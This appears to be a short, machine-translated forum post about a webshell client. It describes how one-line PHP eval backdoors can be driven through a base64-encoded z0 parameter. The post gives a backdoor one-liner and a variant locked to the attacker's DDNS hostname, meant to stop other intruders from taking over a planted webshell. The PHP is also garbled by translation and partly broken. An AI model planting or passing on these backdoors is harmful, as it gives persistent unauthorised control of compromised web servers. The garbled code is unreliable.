Today, I tried the C/S WEB management software "caipao China" and found a fatal vulnerability.
Even if you set the password, use eval ($ _ REQUEST ['moyo ']);
However, if you do not know that the connection password is moyo, you can directly use your one-sentence backdoor.
Because the content passed by $ _ REQUEST ['moyo '] is @ eval (base64_decode ($ _ POST [z0]);
Direct access to/backdoor. php? Z0 = {BASE64 encrypted code} can execute the code.
I don't know whether it's a design defect or a backdoor that I intentionally leave.
If someone uses a password like a sentence, there is a trick to avoid your sentence being stolen.
Local Use of DDNS software such as peanut shells, for example, the assigned domain name is moyo.apiz.org
Then write a backdoor like this.
<? Php $ _ SERVER ['remote _ ADDR '] = gethostbyname ('moyo .apiz.org ')? @ Eval ($ _ REQUEST ['moyo ']): exit ('denied')?>
In this way, a single Backdoor can only be connected to your computer.